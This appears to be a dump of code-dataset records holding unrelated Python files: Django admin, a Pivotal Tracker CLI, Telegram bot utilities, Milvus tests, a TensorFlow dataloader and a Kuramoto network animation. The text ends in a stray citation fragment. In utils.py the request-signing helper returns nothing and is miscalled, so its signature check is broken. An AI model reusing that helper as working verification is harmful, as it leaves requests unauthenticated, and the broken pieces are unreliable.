Ercesscorp.models import RegistrationData ,BlogData\n# Register your models here.\n\nclass BlogAdmin(admin.ModelAdmin):\n list_display = ('title','author')\n list_filter = ('title','author')\n fieldsets = (\n\n ('Blog Information', {\n 'classes': ('collapse',),\n 'fields': ('title','author','image', 'description','date')\n }),\n\n\n )\n\nadmin.site.register(RegistrationData)\nadmin.site.register(BlogData , BlogAdmin)", "sub_path": "Ercesscorp/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 18, "usage_type": "call"}, {"api_name": "Ercesscorp.models.RegistrationData", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 19, "usage_type": "call"}, {"api_name": "Ercesscorp.models.BlogData", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "206193408", "text": "import sys\nimport shlex\nimport argparse\nfrom pypivotal import PivotalIntegration, Helpers\n\n\ndef import_stories(token, project_id):\n pivotal = PivotalIntegration(token)\n tools = Helpers()\n\n stories = pivotal.get_stories(\n project_id, tools.story_states['finished'], tools.two_days_before()\n )\n for story in stories:\n url = story['url']\n created = tools.datetime_string_converter(story['created_at'])\n print(f'Ticket URL: {url}')\n print(f'Creation date: {created}')\n\n\ndef get_projects(token):\n pivotal = PivotalIntegration(token)\n for project in pivotal.projects:\n print(f'Name: {project[\"name\"]} - ID: {project[\"id\"]}')\n\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'token',\n help='Your token to Pivotal Tracker -> https://www.pivotaltracker.com/profile#api'\n )\n start_args = parser.parse_args(argv)\n\n while True:\n print('Enter one of command: projects, stories')\n\n command, *args = shlex.split(input('> '))\n\n if command == 'exit':\n break\n\n elif command == 'help':\n print('Enter exit')\n\n elif command == 'projects':\n get_projects(start_args.token)\n\n elif command == 'stories':\n import_stories(start_args.token, args[0])\n\n else:\n print('Unknown command: {}'.format(command))\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n", "sub_path": "action_performer.py", "file_name": "action_performer.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pypivotal.PivotalIntegration", "line_number": 8, "usage_type": "call"}, {"api_name": "pypivotal.Helpers", "line_number": 9, "usage_type": "call"}, {"api_name": "pypivotal.PivotalIntegration", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}, {"api_name": "shlex.split", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}]} +{"seq_id": "399566986", "text": "import asyncio\nimport glob\nimport random\nimport string\nimport shutil\nimport traceback\nfrom asyncio import sleep, TimeoutError\nfrom collections import namedtuple\nfrom datetime import date\nfrom functools import wraps\nfrom time import time\nfrom hashlib import sha256\nfrom contextlib import suppress\n\nimport aiofiles\nimport aiohttp\nfrom mutagen.flac import FLAC, Picture\nfrom aiogram import exceptions, types\nfrom eyed3.id3 import Tag\nfrom yarl import URL\n\nfrom var import var\nimport config\n\n\ndef sign(args):\n sign_str = ':'.join(str(arg) for arg in args) + config.request_sign\n sha256(sign_str.encode('ascii'))\n\n\ndef check_sign(data: dict):\n input_sign = data.pop('sign', None)\n return sign(data.values(), config.request_sign) == input_sign\n\n\ndef print_traceback(exc):\n print(''.join(traceback.format_tb(exc.__traceback__)))\n\n\nasync def query_answer(query, *args, **kwargs):\n try:\n await query.answer(*args, **kwargs)\n except exceptions.InvalidQueryID as exc:\n print(exc)\n\n\ndef new_callback(*args, sep=\":\"):\n return sep.join(str(arg) for arg in args)\n\n\ndef parse_callback(callback, sep=\":\"):\n return callback.split(sep)\n\n\ndef random_string(length=10):\n return \"\".join(random.sample(string.ascii_letters, length))\n\n\ndef clear_link(message):\n for entity in message.entities:\n if entity.type == \"url\":\n return (\n entity.url or\n message.text[entity.offset: entity.offset + entity.length]\n )\n\n\ndef split_string(text, divider=\"\\n\"):\n result = []\n words = text.split(divider)\n string = \"\"\n for i, word in enumerate(words):\n if len(string + word) > 4096:\n result.append(string)\n string = \"\"\n string += word + divider\n if i == len(words) - 1:\n result.append(string)\n string = \"\"\n return result\n\n\ndef already_downloading(track_id):\n status = var.downloading.get(track_id) # pylint: disable=no-member\n if status is None or int(time()) - status > 60:\n return False\n return True\n\n\ndef donated_user(user_id):\n return user_id in config.admins or user_id in config.donated_users\n\n\ndef islink(text):\n return \"https://\" in text or \"http://\" in text\n\n\nStats = namedtuple(\"Stats\", (\"downloaded_tracks\",\n \"sent_tracks\", \"received_messages\"))\n\n\ndef get_today_stats():\n datestr = date.today().isoformat()\n downloaded_tracks = 0\n sent_tracks = 0\n received_messages = 0\n for filename in glob.iglob(f\"logs/{datestr}/*file_downloads.log\"):\n downloaded_tracks += sum(1 for line in open(filename))\n for filename in glob.iglob(f\"logs/{datestr}/*sent_messages.log\"):\n sent_tracks += sum(1 for line in open(filename))\n for filename in glob.iglob(f\"logs/{datestr}/*messages.log\"):\n received_messages += sum(1 for line in open(filename))\n return Stats(downloaded_tracks, sent_tracks, received_messages)\n\n\ndef encode_url(url, *args, **kwargs):\n data = {}\n for arg in args:\n if isinstance(arg, dict):\n data.update(arg)\n data.update(kwargs)\n url = URL(url).with_query(data)\n return str(url)\n\n\ndef calling_queue(size):\n def wrapper(coro):\n sem = asyncio.Semaphore(size)\n\n @wraps(coro)\n async def decorator(*args, **kwargs):\n async with sem:\n try:\n result = await asyncio.wait_for(coro(*args, **kwargs), 100)\n except TimeoutError as exc:\n print_traceback(exc)\n else:\n return result\n\n return decorator\n\n return wrapper\n\n\nasync def download_file(url, path):\n r = await request_get(url)\n async with aiofiles.open(path, \"wb\") as f:\n async for chunk in r.content.iter_chunked(2048):\n await f.write(chunk)\n return path\n\n\nasync def get_file(url):\n r = await request_get(url)\n return await r.content.read()\n\n\nasync def get_album_cover_url(album_id, res='1000x1000'):\n r = await request_get(f\"https://api.deezer.com/album/{album_id}/image\")\n return str(r.url).replace(\"120x120\", res)\n\n\ndef add_tags(path, track, album, image, lyrics):\n try:\n genre = album[\"genres\"][\"data\"][0][\"name\"]\n except (KeyError, IndexError):\n genre = \"\"\n\n tags = {\n 'artist': track[\"artist\"][\"name\"],\n 'album': track[\"album\"][\"title\"],\n 'album_artist': album[\"artist\"][\"name\"],\n 'original_release_date': track[\"album\"][\"release_date\"],\n 'recording_date': int(track[\"album\"][\"release_date\"].split(\"-\")[0]),\n 'title': track[\"title\"],\n 'track_num': track[\"track_position\"],\n 'disc_num': track[\"disk_number\"],\n 'non_std_genre': genre,\n 'bpm': track[\"bpm\"]\n }\n if path.endswith('mp3'):\n add_mp3_tags(path, tags, image, lyrics, image_mimetype='image/jpg')\n elif path.endswith('flac'):\n add_flac_tags(path, tags, image, lyrics, image_mimetype='image/jpg')\n\n\ndef sc_add_tags(path, track, image, lyrics=None):\n try:\n album_title = track[\"publisher_metadata\"][\"album_title\"]\n except KeyError:\n album_title = \"\"\n\n tags = {\n 'title': track.title,\n 'artist': track.artist,\n 'album': album_title,\n 'album_artist': track.artist if album_title else \"\",\n 'album_title': album_title,\n 'original_release_date': (\n track.created_at.split(\"T\")[0].split(\" \")[0].replace(\"/\", \"-\")),\n 'non_std_genre': track.get(\"genre\", \"\"),\n }\n add_mp3_tags(path, tags, image, lyrics)\n\n\ndef vk_add_tags(path, track, image=None):\n tags = {\n 'title': track.title,\n 'artist': track.artist,\n }\n if track.album:\n tags.update({'album': track.album.title})\n add_mp3_tags(path, tags, image, image_mimetype='image/jpg')\n\n\ndef add_mp3_tags(path, tags, image, lyrics=None, image_mimetype='image/png'):\n tag = Tag()\n tag.parse(path)\n for key, val in tags.items():\n try:\n setattr(tag, key, val)\n except Exception as e:\n print(e)\n if lyrics:\n tag.lyrics.set(lyrics)\n if image:\n tag.images.set(type_=3, img_data=image, mime_type=image_mimetype)\n tag.save(encoding='utf-8')\n\n\ndef add_flac_tags(path, tags, image, lyrics=None, image_mimetype='image/jpg'):\n tag = FLAC(path)\n pic = Picture()\n pic.data = image\n pic.type = 3\n pic.mime = image_mimetype\n tag.add_picture(pic)\n for key, val in tags.items():\n try:\n tag[key] = str(val)\n except Exception as e:\n print(e)\n tag.save()\n\n\nerrcount = {\"count\": 0}\n\n\nasync def request_get(url, params=None, json=None, *args, **kwargs):\n retries_count = 0\n while True:\n try:\n result = await var.session.get(\n url, params=params, json=json, *args, **kwargs)\n except TimeoutError:\n if errcount[\"count\"] > 3:\n exit(1)\n await var.session.close()\n var.session = aiohttp.ClientSession(raise_for_status=True)\n errcount[\"count\"] += 1\n except Exception as err:\n retries_count += 1\n if retries_count > 3:\n print(\n f'url=\\n{url}\\nparams={params}\\n'\n f'args={args}\\nkwargs={kwargs}')\n print_traceback(err)\n raise ValueError(\"Number of retries exceeded\") from err\n else:\n return result\n\n\nasync def request_post(url, *args, **kwargs):\n retries_count = 0\n while True:\n try:\n result = await var.session.post(url, *args, **kwargs)\n except TimeoutError:\n if errcount[\"count\"] > 3:\n exit(1)\n await var.session.close()\n var.session = aiohttp.ClientSession()\n errcount[\"count\"] += 1\n except Exception as err:\n retries_count += 1\n if retries_count > 3:\n print(\n f'url=\\n{url}\\nargs={args}\\nkwargs={kwargs}')\n raise ValueError(\"Number of retries exceeded\") from err\n else:\n return result\n\n\n@calling_queue(3)\nasync def upload_track(bot, path, title, performer, duration=None, tries=0):\n if tries > 3:\n raise RuntimeError(\"can't upload track\")\n try:\n msg = await bot.send_audio(\n chat_id=-1001246220493,\n audio=types.InputFile(path),\n title=title,\n performer=performer,\n duration=duration,\n )\n except exceptions.RetryAfter as e:\n print(f\"flood control exceeded, sleeping for {e.timeout + 10} seconds\")\n await sleep(e.timeout + 10)\n return await upload_track(\n bot, path, title, performer, duration, tries + 1)\n except exceptions.TelegramAPIError:\n await sleep(5)\n return await upload_track(\n bot, path, title, performer, duration, tries + 1)\n return msg\n\n\n# async def launch_with_timeout(size):\n# def wrapper(coro, timeout, on_error=\"raise\"):\n# @wraps(coro)\n# async def decorator(*args, **kwargs):\n# task = asyncio.create_task(coro)\n# try:\n# result = await asyncio.wait_for(task, timeout)\n# return result\n# except TimeoutError as exc:\n# if on_error == \"raise\":\n# raise\n# elif on_error == \"print\":\n# print_traceback(exc)\n\n# return decorator\n\n# return wrapper\n\n\nasync def answer_empty_inline_query(query: types.InlineQuery, text: str):\n if not text:\n return await query.answer(\n results=[],\n switch_pm_text='Search',\n switch_pm_parameter='0')\n elif query.offset == 'done':\n return await query.answer(results=[])\n else:\n return False\n return True\n\n\nasync def delete_later(path: str, delay: int = 100):\n await asyncio.sleep(delay)\n with suppress(FileNotFoundError):\n shutil.rmtree(path.rsplit('/', 1)[0])\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 10067, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "config.request_sign", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.sha256", "line_number": 28, "usage_type": "call"}, {"api_name": "config.request_sign", "line_number": 33, "usage_type": "attribute"}, {"api_name": "traceback.format_tb", "line_number": 37, "usage_type": "call"}, {"api_name": "aiogram.exceptions.InvalidQueryID", "line_number": 43, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 43, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 56, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 56, "usage_type": "attribute"}, {"api_name": "var.var.downloading.get", "line_number": 84, "usage_type": "call"}, {"api_name": "var.var.downloading", "line_number": 84, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 84, "usage_type": "name"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "config.admins", "line_number": 91, "usage_type": "attribute"}, {"api_name": "config.donated_users", "line_number": 91, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "name"}, {"api_name": "glob.iglob", "line_number": 107, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 109, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 111, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 122, "usage_type": "call"}, {"api_name": "asyncio.Semaphore", "line_number": 128, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 134, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 135, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 130, "usage_type": "call"}, {"api_name": "aiofiles.open", "line_number": 147, "usage_type": "call"}, {"api_name": "eyed3.id3.Tag", "line_number": 217, "usage_type": "call"}, {"api_name": "mutagen.flac.FLAC", "line_number": 232, "usage_type": "call"}, {"api_name": "mutagen.flac.Picture", "line_number": 233, "usage_type": "call"}, {"api_name": "var.var.session.get", "line_number": 253, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 253, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 253, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 255, "usage_type": "name"}, {"api_name": "var.var.session.close", "line_number": 258, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 258, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 258, "usage_type": "name"}, {"api_name": "var.var.session", "line_number": 259, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 259, "usage_type": "name"}, {"api_name": "aiohttp.ClientSession", "line_number": 259, "usage_type": "call"}, {"api_name": "var.var.session.post", "line_number": 277, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 277, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 277, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 278, "usage_type": "name"}, {"api_name": "var.var.session.close", "line_number": 281, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 281, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 281, "usage_type": "name"}, {"api_name": "var.var.session", "line_number": 282, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 282, "usage_type": "name"}, {"api_name": "aiohttp.ClientSession", "line_number": 282, "usage_type": "call"}, {"api_name": "aiogram.types.InputFile", "line_number": 301, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 301, "usage_type": "name"}, {"api_name": "aiogram.exceptions.RetryAfter", "line_number": 306, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 306, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 308, "usage_type": "call"}, {"api_name": "aiogram.exceptions.TelegramAPIError", "line_number": 311, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 311, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 312, "usage_type": "call"}, {"api_name": "aiogram.types.InlineQuery", "line_number": 337, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 337, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 352, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 353, "usage_type": "call"}]} +{"seq_id": "124041869", "text": "import logging\nimport time\nimport pdb\nimport copy\nimport threading\nfrom multiprocessing import Pool, Process\nimport pytest\nfrom utils import *\nfrom constants import *\n\nGET_TIMEOUT = 120\nuid = \"test_get\"\n\n\nclass TestGetBase:\n \"\"\"\n ******************************************************************\n The following cases are used to test `insert` function\n ******************************************************************\n \"\"\"\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_simple_index()\n )\n def get_simple_index(self, request, client):\n if str(client.system_cmd(\"mode\")) == \"CPU\":\n if request.param[\"index_type\"] in index_cpu_not_support():\n pytest.skip(\"CPU not support index_type: ivf_sq8h\")\n return request.param\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_single_filter_fields()\n )\n def get_filter_field(self, request):\n yield request.param\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_single_vector_fields()\n )\n def get_vector_field(self, request):\n yield request.param\n\n def test_get_entity_id_not_exised(self, client, collection):\n '''\n target: test delete entity, params entity_id not existed\n method: add entity and delete\n expected: entities empty\n '''\n ids = client.insert(collection, default_entity)\n client.flush([collection])\n entities = client.get_entities(collection, [0,1])\n assert entities\n\n def test_get_empty_collection(self, client, collection):\n '''\n target: test hry entity, params collection_name not existed\n method: add entity and get\n expected: entities empty\n '''\n entities = client.get_entities(collection, [0])\n assert entities\n\n def test_get_entity_collection_not_existed(self, client, collection):\n '''\n target: test get entity, params collection_name not existed\n method: add entity and get\n expected: code error\n '''\n collection_new = gen_unique_str()\n entities = client.get_entities(collection_new, [0])\n assert not entities\n\n def test_insert_get(self, client, collection):\n '''\n target: test get entity\n method: add entities and get\n expected: entity returned\n '''\n ids = client.insert(collection, default_entities)\n client.flush([collection])\n delete_ids = [ids[0]]\n entities = client.get_entities(collection, delete_ids)\n assert len(entities) == 1\n\n def test_insert_get_batch(self, client, collection):\n '''\n target: test get entity\n method: add entities and get\n expected: entity returned\n '''\n get_length = 10\n ids = client.insert(collection, default_entities)\n client.flush([collection])\n delete_ids = ids[:get_length]\n entities = client.get_entities(collection, delete_ids)\n assert len(entities) == get_length", "sub_path": "tests/milvus_http_test/entities/test_get.py", "file_name": "test_get.py", "file_ext": "py", "file_size_in_byte": 3036, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.skip", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "105329083", "text": "import math\nfrom functools import partial\nimport tensorflow as tf\nfrom utils import HyperParams\n\n\nclass DataLoader(HyperParams):\n \"\"\"\n TFRecord를 Parsing하여 Dataset으로 만드는 class\n \"\"\"\n\n autotune = tf.data.experimental.AUTOTUNE\n\n def __init__(self, tfr_path, img_size):\n self.tfr_path = tfr_path\n self.img_size = img_size\n\n def _parse_function(self, tfrecord_serialized, size):\n \"\"\"\n Tensorflow 공식 홈페이지 참고\n \"\"\"\n features = {\n \"image\": tf.io.FixedLenFeature([], tf.string),\n \"label\": tf.io.FixedLenFeature([], tf.int64),\n }\n parsed_features = tf.io.parse_single_example(tfrecord_serialized, features)\n\n image = tf.io.decode_raw(parsed_features[\"image\"], tf.uint8)\n image = tf.reshape(image, [256, 256, 3])\n image = tf.image.resize(image, [size, size])\n\n label = tf.cast(parsed_features[\"label\"], tf.int64)\n label = tf.one_hot(label, 10)\n\n return image, label\n\n def build_dataset(self):\n \"\"\"\n dataset build 함수\n \"\"\"\n # dataset 불러오기\n dataset = tf.data.TFRecordDataset(self.tfr_path)\n # dataset size 정의\n dataset_size = len(list(dataset))\n train_size = int(self.train_size * dataset_size)\n val_size = int((1 - self.train_size) * dataset_size)\n # data parsing and shuffle\n dataset = dataset.map(\n partial(self._parse_function, size=self.img_size),\n num_parallel_calls=self.autotune,\n )\n dataset = dataset.shuffle(dataset_size)\n # trainset build\n train_ds = dataset.take(train_size)\n train_ds = train_ds.batch(self.batch_size)\n train_ds = train_ds.repeat().prefetch(self.autotune)\n # validationset build\n val_ds = dataset.skip(train_size)\n val_ds = val_ds.take(val_size)\n val_ds = val_ds.batch(self.batch_size)\n\n steps = math.floor(dataset_size / self.batch_size)\n\n return train_ds, val_ds, steps\n", "sub_path": "image_classifier/dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 2056, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.HyperParams", "line_number": 7, "usage_type": "name"}, {"api_name": "tensorflow.data", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tensorflow.io.FixedLenFeature", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.io.FixedLenFeature", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.int64", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.io.parse_single_example", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_raw", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.data.TFRecordDataset", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 42, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 49, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "595410678", "text": "import sys\nimport simplejson as json\nimport random\n\n\ndef _read_templates(fn):\n if not fn.is_file():\n print(\"[file error]\", fn, \"is not found.\")\n sys.exit()\n f = fn.open(\"r\")\n jsonData = json.load(f)\n f.close()\n\n return jsonData\n\n\ndef no_premise_q_generator(sbody, fn_templates):\n templates = _read_templates(fn=fn_templates)\n r_msg = \"\"\n r_msg += random.choice(templates[\"cushions\"])\n r_msg += random.choice(templates[\"templates\"])\n r_msg += \"\\n\"\n return r_msg + sbody\n", "sub_path": "src/question_generator/q_no_premise.py", "file_name": "q_no_premise.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.exit", "line_number": 9, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 11, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "99486966", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 27 09:36:05 2019\n\n@author: embog\n\"\"\"\n\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import solve_ivp\nimport scipy.integrate as inte\nfrom matplotlib.colors import LinearSegmentedColormap\n\n'''\nfrom pylab import rcParams\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nplt.rc('font', serif='Palatino')\n'''\n\n\n#para que en jupytter se vean mejor las graficas\n#get_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\n\n# folllowing lines taken form: https://github.com/cbnfreitas/kuramoto_model_integrate_and_plot\ndef chop_colormap(cmap, minval=0.0, maxval=1.0, n=100):\n new_cmap = LinearSegmentedColormap.from_list(\n 'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),\n cmap(np.linspace(minval, maxval, n)))\n return new_cmap\n\n#This cmap is applied in to node coloring \n#cmap_aux = LinearSegmentedColormap.from_list(\"\", [\"cyan\",\"#580058\"])\n#see https://stackoverflow.com/questions/22408237/named-colors-in-matplotlib for colors\ncmap_aux = LinearSegmentedColormap.from_list(\"\", [\"red\",\"yellow\"])\n\n#In gray scale, cyan becomes almost white, this is why we chop the begining of the color map\ncyan_purple_cmap = chop_colormap(cmap_aux, 0.00, 1)\nccmap_aux = LinearSegmentedColormap.from_list(\"\", [\"darkred\",\"red\",\"yellow\",\"red\",\"darkred\"])\n'''\nviridis = plt.cm.get_cmap('viridis', 12)\nccmap_aux = LinearSegmentedColormap.from_list(\"\", [viridis(.01),viridis(.1),viridis(.2),\n viridis(.3),viridis(.4),viridis(.5),\n viridis(.6),viridis(.7),viridis(.8),viridis(0.9),viridis(.99),\n viridis(.9),viridis(.8),viridis(.7),\n viridis(.6),viridis(.5),viridis(.4),\n viridis(.3),viridis(.2),viridis(.1),\n viridis(.01),])\n'''\npsi_purple_cmap = chop_colormap(ccmap_aux, 0.00, 1)\n\ndef frequency_to_color(w):\n colors_cyan_purple = cyan_purple_cmap(np.linspace(0, 1, 1001))\n w_min = min(w)\n w_max = max(w)\n return [colors_cyan_purple[int(1000*(w[i] - w_min)/(w_max - w_min))] for i in range(len(w))]\n\ndef angle_to_color(w):\n colors_cyan_purple = psi_purple_cmap(np.linspace(0, 1, 1001))\n w_min = min(w)\n w_max = max(w)\n return [colors_cyan_purple[int(1000*(w[i] - w_min)/(w_max - w_min))] for i in range(len(w))]\n\n\n# me gustan más estos colores para los plots\ndef colores_tableau():\n # Sources: http://www.randalolson.com/2014/06/28/how-to-make\n # -beautiful-data-visualizations-in-python-with-matplotlib/\n # These are the \"Tableau 20\" colors as RGB. \n tableau20=[(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n # Scale the RGB values to the [0, 1] range, which is the format matplotlib\n # accepts. \n for i in range(len(tableau20)): \n red, green, blue = tableau20[i] \n tableau20[i] = (red / 255., green / 255., blue / 255.) \n return tableau20\n\ntableau20 = colores_tableau()\n\nfilename_in = \"../data/FG_N=500_m=1_4_a=5_sig=0.08_EDGELIST_1.txt\"\ndatos = (np.genfromtxt(filename_in,skip_header=0))\nxdat=datos[:,1]\nydat=datos[:,2]\ne1 = [int(xdat[i]) for i in range(0,len(xdat))]\ne2 = [int(ydat[i]) for i in range(0,len(ydat))]\nmy_edge_list = [[e1[i],e2[i],datos[i,0]] for i in range(0,len(e1))]\nmy_edge_list = np.array(my_edge_list, dtype=np.int)\nI1 = np.max(my_edge_list[:,0])\nI2 = np.max(my_edge_list[:,1])\nNODE_NR = np.max([I1,I2])+1\nNODE_NR\n\n\n# In[19]:\n\n\ndata = np.genfromtxt(\"../pattern.txt\")\ndata = np.transpose(data)\nlist_dat = list(data)\nt = list_dat.pop(0)\ndelta_t_trash = list_dat.pop(0)\nasd = np.array(list_dat)\nt = [int(t[i]) for i in range(len(t))]\n\nnr_e_ini = np.min(t)\nnr_e_fin = np.max(t)\nnr_e_ini\n \n\n\n# In[64]:\n\n\ng_aux = nx.Graph()\nfor i in range(0,NODE_NR):\n g_aux.add_node(i)\nfor i in range(0,len(my_edge_list)):\n g_aux.add_edge(my_edge_list[i][0],my_edge_list[i][1])\n\ng_aux.add_edge(0,432)\n \n#connctd = sorted(nx.connected_components(g_aux), key=len, reverse=True)\n#connctd = [np.array((list(i)),dtype=int) for i in connctd]\n \nfig = plt.figure(figsize=(11,9))\nPOS_FINAL = nx.spring_layout(g_aux, iterations=40)\nnx.draw(g_aux, pos=POS_FINAL, node_size=40,\n edge_color = 'black',\n with_labels=False, font_size=10, font_color='white')\n\n\n# Ahora vamos a animar.\n\n# In[65]:\n\n\nimport matplotlib.animation as animation\nfrom IPython.core.display import display, HTML\ndisplay(HTML('

Animation attempt.

'))\n\n\nimport matplotlib.animation as animation\n\n#%pylab qt\n \n\nplt.rcParams['animation.ffmpeg_path'] = 'c://ffmpeg-4.1.1-win64-static//bin//ffmpeg.exe'\nfig = plt.figure(figsize=(11,9))\n#param, = plt.plot(t,y_t[1])\nang_2pi = np.linspace(0,2*np.pi,num=1000)\n#colors_w = frequency_to_color(w)\n\n\ndef update_argand(i):\n fig.clf()\n \n \n for node in range(0,NODE_NR):\n plt.scatter(np.cos(asd[node][i]),np.sin(asd[node][i]),facecolor=colors_w[node], # color='b',\n marker='o', linewidth=0.5, zorder=3, edgecolor='gray', s = 100)\n \n plt.scatter(r[i]*np.cos(psi[i]),r[i]*np.sin(psi[i]), color='b',\n linewidth = 3, zorder=2)\n plt.plot(r[:i]*np.cos(psi[:i]),r[:i]*np.sin(psi[:i]), color='b', linewidth = 1.0, zorder=1)\n \n plt.plot(np.cos(ang_2pi),np.sin(ang_2pi), color='gray')\n \n plt.xlim([-1.1,1.1])\n plt.ylim([-1.1,1.1])\n \n sm = plt.cm.ScalarMappable(cmap=cyan_purple_cmap, norm=plt.Normalize(vmin=min(w), vmax=max(w)))\n sm._A = []\n cb1 = plt.colorbar(sm)\n cb1.set_label(r'$\\omega_i$')\n \n return fig,\n\ng = nx.Graph()\nfor i in range(0,NODE_NR):\n g.add_node(i)\n\ni = 0\nwhile (i Aly M, Chen J, Turk-Browne NB, & Hasson U (2018). Learning naturalistic temporal structure in the posterior medial network. _Journal of Cognitive Neuroscience_ , 